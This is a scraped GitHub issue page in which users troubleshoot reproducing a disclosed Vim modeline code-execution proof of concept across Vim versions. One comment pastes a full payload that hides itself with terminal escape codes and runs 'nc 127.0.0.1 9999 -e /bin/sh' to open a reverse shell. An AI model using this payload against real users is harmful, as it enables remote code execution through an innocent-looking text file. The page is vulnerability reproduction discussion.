numirias / security Goto Github PK
View Code? Open in Web Editor NEWSome of my security stuff and vulnerabilities. Nothing advanced. More to come.
Home Page: https://twitter.com/rawsec
Some of my security stuff and vulnerabilities. Nothing advanced. More to come.
Home Page: https://twitter.com/rawsec
Hi,
The modeline
is by default enabled on Mac osx. However, both payloads stated in your advisory are not working for Mac with outdated Vim version. They work fine on Ubuntu OS. Is is possible that the implementation of Vim is different? Can you take a look at what happened?
Hi,
I realize that function assert_fails
is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?
Thanks
I got this
cat shell.txt
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
vim shell.txt
"shell.txt" 1L, 264C
处理 modelines 时发生错误:
第 1 行:
E518: 未知的选项: \|\
Hi,
I would like to confirm this poc with VIM version 8.0.1453 which is vuln version
but it doesn't work for me.
I set "modeline" to be activated to /etc/vim/vimrc( i tested with 2 thing, set modeline, :set modeline)
I check with command line "set modeline?"
modline was activated properly...
and then I open poc.txt with vim.
nothing happened. Do you know what problem is??
test poc is like below
:
Hello,
I'm trying the poc on this a vim 8.1.0648-r1 but it doesn't work.
I'm not using vim and have barely knownledge of this editor but here what I have checked so far :
By default :set modelines? show nomodeline. I created a .vimrc with the following content
set modelines=1
set modeline
and run like
vim -u .vimrc and
:set modelines? show modeline. I saved the file poc.txt found in this repo and opened it with vim -u .vimrc poc.txt but it didn't return a uname -a but instead display the content of the file.
vim --version
VIM - Vi IMproved 8.1 (2018 May 18, compiled May 10 2019 13:57:46)
Included patches: 1-648
Modified by Gentoo-8.1.0648-r1
Compiled by portage@localhost
Tiny version without GUI. Features included (+) or not (-):
+acl -extra_search -mouse_sgr -tcl
-arabic -farsi -mouse_sysmouse -termguicolors
+autocmd -file_in_path -mouse_urxvt -terminal
-autochdir -find_in_path -mouse_xterm +terminfo
-autoservername -float -multi_byte -termresponse
-balloon_eval -folding -multi_lang -textobjects
-balloon_eval_term -footer -mzscheme -textprop
-browse +fork() -netbeans_intg -timers
+builtin_terms -gettext -num64 -title
-byte_offset -hangul_input -packages -toolbar
-channel -iconv -path_extra -user_commands
-cindent -insert_expand -perl -vartabs
-clientserver -job -persistent_undo +vertsplit
-clipboard -jumplist -printer -virtualedit
-cmdline_compl -keymap -profile +visual
-cmdline_hist -lambda -python -visualextra
-cmdline_info -langmap -python3 -viminfo
-comments -libcall -quickfix +vreplace
-conceal -linebreak -reltime +wildignore
-cryptv -lispindent -rightleft -wildmenu
-cscope +listcmds -ruby +windows
+cursorbind -localmap +scrollbind +writebackup
-cursorshape -lua -signs -X11
-dialog -menu -smartindent -xfontset
-diff -mksession -startuptime -xim
-digraphs -modify_fname -statusline -xpm
-dnd -mouse -sun_workshop -xsmp
-ebcdic -mouse_dec -syntax -xterm_clipboard
-emacs_tags -mouse_gpm +tag_binary -xterm_save
-eval -mouse_jsbterm -tag_old_static
+ex_extra -mouse_netterm -tag_any_white
system vimrc file: "/etc/vim/vimrc"
user vimrc file: "$HOME/.vimrc"
2nd user vimrc file: "~/.vim/vimrc"
user exrc file: "$HOME/.exrc"
defaults file: "$VIMRUNTIME/defaults.vim"
fall-back for $VIM: "/usr/share/vim"
Compilation: x86_64-gentoo-linux-musl-gcc -c -I. -Iproto -DHAVE_CONFIG_H -O2 -pipe -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1
Linking: x86_64-gentoo-linux-musl-gcc -Wl,-O1 -L/usr/local/lib -Wl,--as-needed -o vim -lm -lncurses -lelf
I suppose on of those feature must be enabled in order to make the poc working, but didn't find yet which on...
Thanks
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.